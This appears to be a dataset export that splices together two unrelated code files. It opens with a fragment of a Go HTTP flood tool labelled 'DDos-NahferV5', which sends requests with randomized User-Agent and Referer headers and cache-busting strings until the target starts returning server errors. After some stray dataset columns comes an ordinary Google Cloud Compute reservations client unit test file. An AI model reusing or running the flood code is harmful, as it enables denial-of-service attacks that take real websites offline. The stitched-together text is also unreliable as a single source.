} else {
q, err = http.NewRequest("POST", url, strings.NewReader(data))
}
if err != nil {
s <- callExitOnErr
return
}
q.Header.Set("User-Agent", headersUseragents[rand.Intn(len(headersUseragents))])
q.Header.Set("Cache-Control", "no-cache")
q.Header.Set("Accept-Charset", acceptCharset)
q.Header.Set("Referer", headersReferers[rand.Intn(len(headersReferers))]+buildblock(rand.Intn(5)+5))
q.Header.Set("Keep-Alive", strconv.Itoa(rand.Intn(10)+100))
q.Header.Set("Connection", "keep-alive")
q.Header.Set("Host", host)
// Overwrite headers with parameters
for _, element := range headers {
words := strings.Split(element, ":")
q.Header.Set(strings.TrimSpace(words[0]), strings.TrimSpace(words[1]))
}
r, e := client.Do(q)
if e != nil {
fmt.Fprintln(os.Stderr, e.Error())
if strings.Contains(e.Error(), "socket: too many open files") {
s <- callExitOnTooManyFiles
return
}
s <- callExitOnErr
return
}
r.Body.Close()
s <- callGotOk
if safe {
if r.StatusCode >= 500 {
s <- targetComplete
}
}
}
}
func buildblock(size int) (s string) {
var a []rune
for i := 0; i < size; i++ {
a = append(a, rune(rand.Intn(25)+65))
}
return string(a)
}
|
[
"\"DDos-NahferV5\""
] |
[] |
[
"DDos-NahferV5"
] |
[]
|
["DDos-NahferV5"]
|
go
| 1 | 0 | |
tests/unit/gapic/compute_v1/test_reservations.py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import packaging.version
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from requests import Response
from requests.sessions import Session
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.compute_v1.services.reservations import ReservationsClient
from google.cloud.compute_v1.services.reservations import pagers
from google.cloud.compute_v1.services.reservations import transports
from google.cloud.compute_v1.services.reservations.transports.base import (
_GOOGLE_AUTH_VERSION,
)
from google.cloud.compute_v1.types import compute
from google.oauth2 import service_account
import google.auth
# TODO(busunkim): Once google-auth >= 1.25.0 is required transitively
# through google-api-core:
# - Delete the auth "less than" test cases
# - Delete these pytest markers (Make the "greater than or equal to" tests the default).
requires_google_auth_lt_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"),
reason="This test requires google-auth < 1.25.0",
)
requires_google_auth_gte_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"),
reason="This test requires google-auth >= 1.25.0",
)
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert ReservationsClient._get_default_mtls_endpoint(None) is None
assert (
ReservationsClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
)
assert (
ReservationsClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
ReservationsClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
ReservationsClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert ReservationsClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [ReservationsClient,])
def test_reservations_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "compute.googleapis.com:443"
@pytest.mark.parametrize(
"transport_class,transport_name", [(transports.ReservationsRestTransport, "rest"),]
)
def test_reservations_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [ReservationsClient,])
def test_reservations_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "compute.googleapis.com:443"
def test_reservations_client_get_transport_class():
transport = ReservationsClient.get_transport_class()
available_transports = [
transports.ReservationsRestTransport,
]
assert transport in available_transports
transport = ReservationsClient.get_transport_class("rest")
assert transport == transports.ReservationsRestTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(ReservationsClient, transports.ReservationsRestTransport, "rest"),],
)
@mock.patch.object(
ReservationsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ReservationsClient)
)
def test_reservations_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(ReservationsClient, "get_transport_class") as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(ReservationsClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(ReservationsClient, transports.ReservationsRestTransport, "rest", "true"),
(ReservationsClient, transports.ReservationsRestTransport, "rest", "false"),
],
)
@mock.patch.object(
ReservationsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ReservationsClient)
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_reservations_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(ReservationsClient, transports.ReservationsRestTransport, "rest"),],
)
def test_reservations_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(ReservationsClient, transports.ReservationsRestTransport, "rest"),],
)
def test_reservations_client_client_options_credentials_file(
client_class, transport_class, transport_name
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_aggregated_list_rest(
transport: str = "rest", request_type=compute.AggregatedListReservationsRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.ReservationAggregatedList(
id="id_value",
items={
"key_value": compute.ReservationsScopedList(
reservations=[compute.Reservation(commitment="commitment_value")]
)
},
kind="kind_value",
next_page_token="next_page_token_value",
self_link="self_link_value",
unreachables=["unreachables_value"],
warning=compute.Warning(code=compute.Warning.Code.CLEANUP_FAILED),
)
# Wrap the value into a proper Response obj
json_return_value = compute.ReservationAggregatedList.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.aggregated_list(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.AggregatedListPager)
assert response.id == "id_value"
assert response.items == {
"key_value": compute.ReservationsScopedList(
reservations=[compute.Reservation(commitment="commitment_value")]
)
}
assert response.kind == "kind_value"
assert response.next_page_token == "next_page_token_value"
assert response.self_link == "self_link_value"
assert response.unreachables == ["unreachables_value"]
assert response.warning == compute.Warning(code=compute.Warning.Code.CLEANUP_FAILED)
def test_aggregated_list_rest_from_dict():
test_aggregated_list_rest(request_type=dict)
def test_aggregated_list_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.ReservationAggregatedList()
# Wrap the value into a proper Response obj
json_return_value = compute.ReservationAggregatedList.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.aggregated_list(project="project_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
def test_aggregated_list_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.aggregated_list(
compute.AggregatedListReservationsRequest(), project="project_value",
)
def test_aggregated_list_pager():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Set the response as a series of pages
response = (
compute.ReservationAggregatedList(
items={
"a": compute.ReservationsScopedList(),
"b": compute.ReservationsScopedList(),
"c": compute.ReservationsScopedList(),
},
next_page_token="abc",
),
compute.ReservationAggregatedList(items={}, next_page_token="def",),
compute.ReservationAggregatedList(
items={"g": compute.ReservationsScopedList(),}, next_page_token="ghi",
),
compute.ReservationAggregatedList(
items={
"h": compute.ReservationsScopedList(),
"i": compute.ReservationsScopedList(),
},
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(compute.ReservationAggregatedList.to_json(x) for x in response)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
metadata = ()
pager = client.aggregated_list(request={})
assert pager._metadata == metadata
assert isinstance(pager.get("a"), compute.ReservationsScopedList)
assert pager.get("h") is None
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, tuple) for i in results)
for result in results:
assert isinstance(result, tuple)
assert tuple(type(t) for t in result) == (
str,
compute.ReservationsScopedList,
)
assert pager.get("a") is None
assert isinstance(pager.get("h"), compute.ReservationsScopedList)
pages = list(client.aggregated_list(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_delete_rest(
transport: str = "rest", request_type=compute.DeleteReservationRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
error=compute.Error(errors=[compute.Errors(code="code_value")]),
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
warnings=[compute.Warnings(code=compute.Warnings.Code.CLEANUP_FAILED)],
zone="zone_value",
)
# Wrap the value into a proper Response obj
json_return_value = compute.Operation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.delete(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.error == compute.Error(errors=[compute.Errors(code="code_value")])
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.warnings == [
compute.Warnings(code=compute.Warnings.Code.CLEANUP_FAILED)
]
assert response.zone == "zone_value"
def test_delete_rest_from_dict():
test_delete_rest(request_type=dict)
def test_delete_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
json_return_value = compute.Operation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete(
project="project_value", zone="zone_value", reservation="reservation_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert "reservation_value" in http_call[1] + str(body) + str(params)
def test_delete_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete(
compute.DeleteReservationRequest(),
project="project_value",
zone="zone_value",
reservation="reservation_value",
)
def test_get_rest(transport: str = "rest", request_type=compute.GetReservationRequest):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Reservation(
commitment="commitment_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
id=205,
kind="kind_value",
name="name_value",
satisfies_pzs=True,
self_link="self_link_value",
specific_reservation=compute.AllocationSpecificSKUReservation(count=553),
specific_reservation_required=True,
status=compute.Reservation.Status.CREATING,
zone="zone_value",
)
# Wrap the value into a proper Response obj
json_return_value = compute.Reservation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Reservation)
assert response.commitment == "commitment_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.id == 205
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.satisfies_pzs is True
assert response.self_link == "self_link_value"
assert response.specific_reservation == compute.AllocationSpecificSKUReservation(
count=553
)
assert response.specific_reservation_required is True
assert response.status == compute.Reservation.Status.CREATING
assert response.zone == "zone_value"
def test_get_rest_from_dict():
test_get_rest(request_type=dict)
def test_get_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Reservation()
# Wrap the value into a proper Response obj
json_return_value = compute.Reservation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get(
project="project_value", zone="zone_value", reservation="reservation_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert "reservation_value" in http_call[1] + str(body) + str(params)
def test_get_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get(
compute.GetReservationRequest(),
project="project_value",
zone="zone_value",
reservation="reservation_value",
)
def test_get_iam_policy_rest(
transport: str = "rest", request_type=compute.GetIamPolicyReservationRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Policy(
audit_configs=[
compute.AuditConfig(
audit_log_configs=[
compute.AuditLogConfig(
exempted_members=["exempted_members_value"]
)
]
)
],
bindings=[compute.Binding(binding_id="binding_id_value")],
etag="etag_value",
iam_owned=True,
rules=[compute.Rule(action=compute.Rule.Action.ALLOW)],
version=774,
)
# Wrap the value into a proper Response obj
json_return_value = compute.Policy.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get_iam_policy(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Policy)
assert response.audit_configs == [
compute.AuditConfig(
audit_log_configs=[
compute.AuditLogConfig(exempted_members=["exempted_members_value"])
]
)
]
assert response.bindings == [compute.Binding(binding_id="binding_id_value")]
assert response.etag == "etag_value"
assert response.iam_owned is True
assert response.rules == [compute.Rule(action=compute.Rule.Action.ALLOW)]
assert response.version == 774
def test_get_iam_policy_rest_from_dict():
test_get_iam_policy_rest(request_type=dict)
def test_get_iam_policy_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Policy()
# Wrap the value into a proper Response obj
json_return_value = compute.Policy.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_iam_policy(
project="project_value", zone="zone_value", resource="resource_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert "resource_value" in http_call[1] + str(body) + str(params)
def test_get_iam_policy_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_iam_policy(
compute.GetIamPolicyReservationRequest(),
project="project_value",
zone="zone_value",
resource="resource_value",
)
def test_insert_rest(
transport: str = "rest", request_type=compute.InsertReservationRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
error=compute.Error(errors=[compute.Errors(code="code_value")]),
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
warnings=[compute.Warnings(code=compute.Warnings.Code.CLEANUP_FAILED)],
zone="zone_value",
)
# Wrap the value into a proper Response obj
json_return_value = compute.Operation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.insert(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.error == compute.Error(errors=[compute.Errors(code="code_value")])
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.warnings == [
compute.Warnings(code=compute.Warnings.Code.CLEANUP_FAILED)
]
assert response.zone == "zone_value"
def test_insert_rest_from_dict():
test_insert_rest(request_type=dict)
def test_insert_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
json_return_value = compute.Operation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
reservation_resource = compute.Reservation(commitment="commitment_value")
client.insert(
project="project_value",
zone="zone_value",
reservation_resource=reservation_resource,
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert compute.Reservation.to_json(
reservation_resource,
including_default_value_fields=False,
use_integers_for_enums=False,
) in http_call[1] + str(body) + str(params)
def test_insert_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.insert(
compute.InsertReservationRequest(),
project="project_value",
zone="zone_value",
reservation_resource=compute.Reservation(commitment="commitment_value"),
)
def test_list_rest(
transport: str = "rest", request_type=compute.ListReservationsRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.ReservationList(
id="id_value",
items=[compute.Reservation(commitment="commitment_value")],
kind="kind_value",
next_page_token="next_page_token_value",
self_link="self_link_value",
warning=compute.Warning(code=compute.Warning.Code.CLEANUP_FAILED),
)
# Wrap the value into a proper Response obj
json_return_value = compute.ReservationList.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListPager)
assert response.id == "id_value"
assert response.items == [compute.Reservation(commitment="commitment_value")]
assert response.kind == "kind_value"
assert response.next_page_token == "next_page_token_value"
